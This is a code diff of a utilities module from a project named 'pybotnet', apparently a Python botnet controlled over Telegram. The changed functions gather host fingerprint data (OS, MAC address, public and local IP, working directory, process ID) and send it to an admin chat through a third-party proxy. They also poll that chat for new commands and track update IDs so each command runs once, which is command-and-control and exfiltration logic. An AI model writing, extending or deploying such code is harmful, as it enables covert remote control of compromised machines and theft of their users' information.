@@ -4,6 +4,7 @@
 from . import settings
 
 # import built-in & third-party modules
+from typing import List
 import requests
 import json
 import platform
@@ -31,7 +32,7 @@ def get_host_name_ip() -> str:
 
 
 def get_my_global_ip() -> str:
-
+    '''return system ip (3 API server)'''
     try:
         return get_my_ip_server_1()
 
@@ -50,6 +51,8 @@ def get_my_global_ip() -> str:
 
 
 def get_my_ip_server_1():
+    '''return global ip V4 and loaction \n
+    server 1'''
     takeip = requests.post("https://api.myip.com", timeout=3).text
     ip = str(json.loads(takeip)["ip"])
     country = str(json.loads(takeip)["country"])
@@ -58,10 +61,14 @@ def get_my_ip_server_1():
 
 
 def get_my_ip_server_2():
+    '''return global ip V4 \n
+    server 2'''
     return requests.get('https://api.ipify.org', timeout=3).text
 
 
 def get_my_ip_server_3():
+    '''return global ip V4 \n
+    server 3'''
     return requests.get('https://ident.me', timeout=3).text
 
 
@@ -69,9 +76,9 @@ def get_short_system_info() -> str:
     '''system mac addres, ip addres, operating system'''
 
     short_system_info = f"""------system info------
-operating system: {platform.system()}
-mac addres: {get_system_mac_addres()}
-global ip: {get_my_global_ip()}"""
+OS: {platform.system()}
+Mac Addres: {get_system_mac_addres()}
+Global ip: {get_my_global_ip()}"""
 
     return short_system_info
 
@@ -81,11 +88,12 @@ def get_full_system_info(pybotnet_uptime=None) -> str:
     get_short_system_info and pybotnet up time, local ip, pybotnet version'''
 
     full_system_info = f"""{get_short_system_info()}
-pybotnet up time: {pybotnet_uptime} Seconds
-local ip: {get_host_name_ip()}
-current route: {os.getcwd()}
-pid: {os.getpid()}
-pybotnet version: {settings.pybotnet_version}
+Up Time: {pybotnet_uptime} Seconds
+Local ip: {get_host_name_ip()}
+Current Route: {os.getcwd()}
+Pid: {os.getpid()}
+cpu count: {os.cpu_count()}
+Pybotnet Version: {settings.pybotnet_version}
 -----------------------"""
 
     # TODO: system uptime: {None}
@@ -101,26 +109,6 @@ def make_send_message_api_url(TELEGRAM_TOKEN, ADMIN_CHAT_ID, message) -> str:
     return f"https://api.telegram.org/bot{TELEGRAM_TOKEN}/SendMessage?chat_id={ADMIN_CHAT_ID}&text={message}"
 
 
-def post_data(url, logger) -> bool:
-    '''return False or response\n'''
-    try:
-        response = requests.post(url=url, timeout=5)
-        if response.status_code == 200:
-            logger.info('post_data data sended response: 200')
-            return response
-
-        logger.error(
-            f'post_data error: data not sended response: {response.status_code}')
-        return False
-
-    except requests.exceptions.Timeout:
-        logger.error(f'post_data error: timeout ')
-        return False
-    except:
-        logger.error(f'post_data Unknown error')
-        return False
-
-
 def post_data_by_third_party_proxy(url, logger, time_out=5):
     '''
     return False or response \n
@@ -157,6 +145,13 @@ def post_data_by_third_party_proxy(url, logger, time_out=5):
         return False
 
 
+def send_message_by_third_party_proxy(message: str, TELEGRAM_TOKEN: str, ADMIN_CHAT_ID: str, logger):
+    '''Send messages by api url and third party proxy to adimn'''
+    api_url = make_send_message_api_url(
+        TELEGRAM_TOKEN, ADMIN_CHAT_ID, message)
+    return post_data_by_third_party_proxy(api_url, logger)
+
+
 def clean_response_third_party_proxy(response, logger):
     '''get http response from third party proxy (http debuger .com) and get telegram data'''
     try:
@@ -171,7 +166,7 @@ def clean_response_third_party_proxy(response, logger):
         return False
 
 
-def get_update_by_third_party_proxy(TELEGRAM_TOKEN, logger):
+def get_update_by_third_party_proxy(TELEGRAM_TOKEN, logger) -> List[dict]:
     '''Get the latest command sent to the bot in the last 24 hours by third party proxy'''
 
     get_updates_api_url = f"https://api.telegram.org/bot{TELEGRAM_TOKEN}/Getupdates"
@@ -231,6 +226,7 @@ def get_last_update_id(messages: list, ADMIN_CHAT_ID: str, logger):
 
 
 def set_message_ofset(messages: list, TELEGRAM_TOKEN: str, ADMIN_CHAT_ID: str, logger) -> None:
+    '''this founction seen the last message from admin and delete before message'''
 
     update_id = get_last_update_id(messages, ADMIN_CHAT_ID, logger)
 
@@ -244,30 +240,55 @@ def set_message_ofset(messages: list, TELEGRAM_TOKEN: str, ADMIN_CHAT_ID: str, l
     logger.error('set_message_ofset Failed')
 
 
-def extract_last_admin_command(messages: list, ADMIN_CHAT_ID: str, TELEGRAM_TOKEN: str,  logger):
-
+def extract_last_admin_command(messages: list, ADMIN_CHAT_ID: str, TELEGRAM_TOKEN: str,  logger, previous_update_id=[0]):
+    '''extract command in html source 
+    this function use for httpdebuger.com: get_update_by_third_party_proxy()'''
     message_text = False
 
     for message in messages[::-1]:
         try:
             last_message_chat_id = str(message['message']['chat']['id'])
             last_text = message['message']['text']
-
+            update_id = int(message["update_id"])
         except:
             continue
 
         if last_message_chat_id == ADMIN_CHAT_ID:
+            if update_id <= previous_update_id[0]:
+                logger.info(
+                    f' - previous command from admin: {last_text}, "This command has already been executed"')
+                break
+            previous_update_id[0] = update_id
             logger.info(
-                f' -command from admin: {last_text}')
+                f' - new command from admin: {last_text}')
             message_text = last_text
             break
+
+        # Messages from Anonymous
         logger.info(f' -message from {last_message_chat_id}: {last_text}')
 
+    # remove previous commands
     set_message_ofset(messages, TELEGRAM_TOKEN, ADMIN_CHAT_ID, logger)
 
     return message_text
 
 
+def get_last_admin_command_by_third_party_proxy(ADMIN_CHAT_ID: str, TELEGRAM_TOKEN: str,
+                                                previous_update_id: List[int], logger):
+    ''' extract command from  admin or false'''
+
+    messages_list = get_update_by_third_party_proxy(
+        TELEGRAM_TOKEN, logger=logger)
+
+    # if message list not False > extract last message from admin > if last admin message not False return
+    if messages_list:
+        last_message = extract_last_admin_command(
+            messages_list, ADMIN_CHAT_ID, TELEGRAM_TOKEN, logger, previous_update_id)
+        if last_message:
+            return last_message
+    return False
+
+
 def make_zip_file(route, logger, delete_input_file=False):
     '''get file route, make zip file and save to courent route \n
     return True, new_file_name |or| return False, 'None' \n
